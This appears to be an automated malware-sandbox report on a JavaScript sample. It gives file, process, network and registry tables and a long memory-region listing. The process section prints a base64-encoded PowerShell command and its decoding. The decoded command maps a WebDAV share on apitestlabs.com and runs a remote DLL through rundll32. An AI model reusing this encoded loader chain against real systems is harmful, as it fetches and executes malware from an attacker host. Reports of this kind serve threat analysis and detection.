## Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| 2251913620121805788.js | ASCII text, with very long lines (65536), with no line terminators | initial sample | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wr300rc.tpj.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyr1crwa.xev.ps1 | ASCII text, with no line terminators | dropped | |
## Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2251913620121805788.js" | |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAzADEAMQA3ADAAMQAzADUANwA1ADEAMgA1ADUALgBkAGwAbAAsAEUAbgB0AHIAeQA= | |
| C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\net.exe | "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ | |

The `-EncodedCommand` argument is base64-encoded UTF-16LE text; it decodes to `net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry`, which is what produces the net.exe and rundll32.exe child processes listed in this table.
## URLs

| Name | IP | Malicious |
|---|---|---|
| http://apitestlabs.com:8888/ | unknown | |
| https://aka.ms/pscore68 | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |
| http://apitestlabs.com:8888/d | unknown | |
| http://apitestlabs.com:8888/em | unknown | |
## Domains

| Name | IP | Malicious |
|---|---|---|
| apitestlabs.com | 94.159.113.48 | |
| 198.187.3.20.in-addr.arpa | unknown | |
## IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 94.159.113.48 | apitestlabs.com | Russian Federation | |
## Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted | |
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
AA09EFE000
|
stack
|
page read and write
|
||
1FD696A6000
|
heap
|
page read and write
|
||
1FD69699000
|
heap
|
page read and write
|
||
680357E000
|
stack
|
page read and write
|
||
1D0E1D44000
|
heap
|
page read and write
|
||
1FD514D1000
|
trusted library allocation
|
page read and write
|
||
19123248000
|
heap
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
9F7A71F000
|
stack
|
page read and write
|
||
1912322D000
|
heap
|
page read and write
|
||
19123493000
|
heap
|
page read and write
|
||
1D0E1AC0000
|
heap
|
page read and write
|
||
1FD518B6000
|
trusted library allocation
|
page read and write
|
||
1D0E1ADF000
|
heap
|
page read and write
|
||
1FD50FC0000
|
trusted library allocation
|
page read and write
|
||
1FD515EF000
|
trusted library allocation
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
1FD4F599000
|
heap
|
page read and write
|
||
1FD51470000
|
heap
|
page execute and read and write
|
||
7FFB4AA02000
|
trusted library allocation
|
page read and write
|
||
DDDEFE000
|
stack
|
page read and write
|
||
DDE1FB000
|
stack
|
page read and write
|
||
191237B0000
|
heap
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
19123223000
|
heap
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
1D0E1B00000
|
heap
|
page read and write
|
||
1D0E1ADB000
|
heap
|
page read and write
|
||
19121421000
|
heap
|
page read and write
|
||
1FD515EC000
|
trusted library allocation
|
page read and write
|
||
1D0E1AEE000
|
heap
|
page read and write
|
||
19123417000
|
heap
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
68039FE000
|
stack
|
page read and write
|
||
1FD69633000
|
heap
|
page read and write
|
||
1FD514F3000
|
trusted library allocation
|
page read and write
|
||
1FD4F650000
|
heap
|
page read and write
|
||
19123226000
|
heap
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
1FD5195A000
|
trusted library allocation
|
page read and write
|
||
1FD697C0000
|
heap
|
page read and write
|
||
1912143D000
|
heap
|
page read and write
|
||
19123231000
|
heap
|
page read and write
|
||
19123246000
|
heap
|
page read and write
|
||
1D0E1AE0000
|
heap
|
page read and write
|
||
1FD69611000
|
heap
|
page read and write
|
||
DDD6F4000
|
stack
|
page read and write
|
||
19121449000
|
heap
|
page read and write
|
||
191213AA000
|
heap
|
page read and write
|
||
1FD69720000
|
heap
|
page execute and read and write
|
||
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
DDDBFF000
|
stack
|
page read and write
|
||
19121645000
|
heap
|
page read and write
|
||
1FD516E9000
|
trusted library allocation
|
page read and write
|
||
19121434000
|
heap
|
page read and write
|
||
1FD69990000
|
heap
|
page read and write
|
||
1D0E18E0000
|
heap
|
page read and write
|
||
1FD5197D000
|
trusted library allocation
|
page read and write
|
||
9F7A79D000
|
stack
|
page read and write
|
||
7FFB4AAB0000
|
trusted library allocation
|
page read and write
|
||
1FD614DF000
|
trusted library allocation
|
page read and write
|
||
19121640000
|
heap
|
page read and write
|
||
1FD515DB000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABE2000
|
trusted library allocation
|
page read and write
|
||
19123421000
|
heap
|
page read and write
|
||
1FD6967D000
|
heap
|
page read and write
|
||
9F7AA7F000
|
stack
|
page read and write
|
||
7FFB4AC50000
|
trusted library allocation
|
page read and write
|
||
1912323F000
|
heap
|
page read and write
|
||
19123272000
|
heap
|
page read and write
|
||
19121421000
|
heap
|
page read and write
|
||
DDDCFF000
|
stack
|
page read and write
|
||
23CB759A000
|
heap
|
page read and write
|
||
23CB75A7000
|
heap
|
page read and write
|
||
6803BFB000
|
stack
|
page read and write
|
||
1912323D000
|
heap
|
page read and write
|
||
1D0E1A70000
|
heap
|
page read and write
|
||
1FD51010000
|
heap
|
page read and write
|
||
1FD6961D000
|
heap
|
page read and write
|
||
1FD51A08000
|
trusted library allocation
|
page read and write
|
||
6803877000
|
stack
|
page read and write
|
||
1D0E1D40000
|
heap
|
page read and write
|
||
1D0E1D4B000
|
heap
|
page read and write
|
||
191213AB000
|
heap
|
page read and write
|
||
1912322F000
|
heap
|
page read and write
|
||
23CB7575000
|
heap
|
page read and write
|
||
19123320000
|
heap
|
page read and write
|
||
1D0E1ADB000
|
heap
|
page read and write
|
||
1912324D000
|
heap
|
page read and write
|
||
1FD69726000
|
heap
|
page execute and read and write
|
||
23CB7594000
|
heap
|
page read and write
|
||
7FFB4ABD0000
|
trusted library allocation
|
page execute and read and write
|
||
1FD695E0000
|
heap
|
page read and write
|
||
7FFB4ABF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AA03000
|
trusted library allocation
|
page execute and read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
23CB7567000
|
heap
|
page read and write
|
||
19123225000
|
heap
|
page read and write
|
||
1912323B000
|
heap
|
page read and write
|
||
7FFB4ABC0000
|
trusted library allocation
|
page execute and read and write
|
||
19123223000
|
heap
|
page read and write
|
||
1FD515DE000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB20000
|
trusted library allocation
|
page execute and read and write
|
||
1912337E000
|
heap
|
page read and write
|
||
1912341C000
|
heap
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
1D0E1AB3000
|
heap
|
page read and write
|
||
23CB757A000
|
heap
|
page read and write
|
||
19123419000
|
heap
|
page read and write
|
||
23CB7573000
|
heap
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
1FD4F5DA000
|
heap
|
page read and write
|
||
7FFB4AC40000
|
trusted library allocation
|
page read and write
|
||
19121380000
|
heap
|
page read and write
|
||
1D0E1AEC000
|
heap
|
page read and write
|
||
19123230000
|
heap
|
page read and write
|
||
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
19123321000
|
heap
|
page read and write
|
||
1FD4F570000
|
heap
|
page read and write
|
||
19123227000
|
heap
|
page read and write
|
||
68031CE000
|
stack
|
page read and write
|
||
23CB7594000
|
heap
|
page read and write
|
||
1FD4F591000
|
heap
|
page read and write
|
||
6803A7E000
|
stack
|
page read and write
|
||
1FD4F64C000
|
heap
|
page read and write
|
||
7FFB4AAE6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ABBA000
|
trusted library allocation
|
page read and write
|
||
1D0E5540000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
68037F8000
|
stack
|
page read and write
|
||
19123233000
|
heap
|
page read and write
|
||
1FD4F5B1000
|
heap
|
page read and write
|
||
23CB756B000
|
heap
|
page read and write
|
||
7FFB4AA10000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABB1000
|
trusted library allocation
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
7FFB4AABC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
6803979000
|
stack
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
7DF4AEC80000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AAC0000
|
trusted library allocation
|
page execute and read and write
|
||
68038F8000
|
stack
|
page read and write
|
||
680318E000
|
stack
|
page read and write
|
||
1FD4F557000
|
heap
|
page read and write
|
||
1FD515E1000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAB6000
|
trusted library allocation
|
page read and write
|
||
1D0E1AC8000
|
heap
|
page read and write
|
||
23CB7573000
|
heap
|
page read and write
|
||
1FD4F5DF000
|
heap
|
page read and write
|
||
1FD51015000
|
heap
|
page read and write
|
||
1FD61542000
|
trusted library allocation
|
page read and write
|
||
AA09FFB000
|
stack
|
page read and write
|
||
7FFB4AA0D000
|
trusted library allocation
|
page execute and read and write
|
||
23CB7550000
|
heap
|
page read and write
|
||
6803103000
|
stack
|
page read and write
|
||
DDDAFE000
|
stack
|
page read and write
|
||
23CB77B0000
|
heap
|
page read and write
|
||
1D0E1B08000
|
heap
|
page read and write
|
||
23CB7540000
|
heap
|
page read and write
|
||
191213B1000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
1D0E4D40000
|
trusted library allocation
|
page read and write
|
||
1912323C000
|
heap
|
page read and write
|
||
19121340000
|
heap
|
page read and write
|
||
AA09BFB000
|
stack
|
page read and write
|
||
1FD518B0000
|
trusted library allocation
|
page read and write
|
||
6803B7E000
|
stack
|
page read and write
|
||
191213C3000
|
heap
|
page read and write
|
||
19121310000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
23CB77B4000
|
heap
|
page read and write
|
||
1912341B000
|
heap
|
page read and write
|
||
23CB7548000
|
heap
|
page read and write
|
||
19123256000
|
heap
|
page read and write
|
||
19123282000
|
heap
|
page read and write
|
||
1FD519D8000
|
trusted library allocation
|
page read and write
|
||
1D0E19E0000
|
heap
|
page read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
1D0E1AE4000
|
heap
|
page read and write
|
||
1912143E000
|
heap
|
page read and write
|
||
AA09E7E000
|
stack
|
page read and write
|
||
23CB757A000
|
heap
|
page read and write
|
||
DDD7FE000
|
stack
|
page read and write
|
||
1FD51560000
|
trusted library allocation
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
191213B1000
|
heap
|
page read and write
|
||
680377E000
|
stack
|
page read and write
|
||
1D0E1AF3000
|
heap
|
page read and write
|
||
1FD50FB0000
|
heap
|
page readonly
|
||
19121560000
|
heap
|
page read and write
|
||
1FD4F730000
|
heap
|
page read and write
|
||
1FD515F2000
|
trusted library allocation
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
DDDDFF000
|
stack
|
page read and write
|
||
1FD4F550000
|
heap
|
page read and write
|
||
68035FC000
|
stack
|
page read and write
|
||
1FD4F5D8000
|
heap
|
page read and write
|
||
1FD51630000
|
trusted library allocation
|
page read and write
|
||
19121437000
|
heap
|
page read and write
|
||
68034FE000
|
stack
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
AA09F7D000
|
stack
|
page read and write
|
||
1D0E1AB0000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1FD51410000
|
heap
|
page execute and read and write
|
||
1FD4F750000
|
heap
|
page read and write
|
||
1D0E1ACE000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1912143A000
|
heap
|
page read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
1D0E19C0000
|
heap
|
page read and write
|
||
23CB7500000
|
heap
|
page read and write
|
||
1FD51533000
|
trusted library allocation
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
23CB74E0000
|
heap
|
page read and write
|
||
19123420000
|
heap
|
page read and write
|
||
1FD614D1000
|
trusted library allocation
|
page read and write
|
||
19121441000
|
heap
|
page read and write
|
||
19121442000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1FD51629000
|
trusted library allocation
|
page read and write
|
||
23CB759D000
|
heap
|
page read and write
|
||
68036FE000
|
stack
|
page read and write
|
||
1FD50F80000
|
trusted library allocation
|
page read and write
|
||
1FD50FA0000
|
trusted library allocation
|
page read and write
|
||
1FD515D8000
|
trusted library allocation
|
page read and write
|
||
1FD6961B000
|
heap
|
page read and write
|
||
1FD4F7A5000
|
heap
|
page read and write
|
||
1FD696AD000
|
heap
|
page read and write
|
||
23CB756B000
|
heap
|
page read and write
|
||
680347F000
|
stack
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
19121320000
|
heap
|
page read and write
|
||
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
68038FE000
|
stack
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
19123220000
|
heap
|
page read and write
|
||
7FFB4AA04000
|
trusted library allocation
|
page read and write
|
||
1FD514EB000
|
trusted library allocation
|
page read and write
|
||
19123494000
|
heap
|
page read and write
|
||
1FD514C0000
|
heap
|
page read and write
|
||
19123241000
|
heap
|
page read and write
|
||
DDDFFD000
|
stack
|
page read and write
|
||
23CB7400000
|
heap
|
page read and write
|
||
1912324A000
|
heap
|
page read and write
|
||
7FFB4AC00000
|
trusted library allocation
|
page read and write
|
||
19123265000
|
heap
|
page read and write
|
||
7FFB4AC30000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page read and write
|
||
191213B0000
|
heap
|
page read and write
|
||
1FD515E4000
|
trusted library allocation
|
page read and write
|
||
1FD50F50000
|
heap
|
page read and write
|
||
23CB75A7000
|
heap
|
page read and write
|
||
DDD8FE000
|
stack
|
page read and write
|
||
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
9F7A69A000
|
stack
|
page read and write
|
||
19123241000
|
heap
|
page read and write
|
||
191213AB000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
19123262000
|
heap
|
page read and write
|
||
19121439000
|
heap
|
page read and write
|
||
1FD4F7A0000
|
heap
|
page read and write
|
||
680367F000
|
stack
|
page read and write
|
A further 260 memdump entries are omitted from this listing.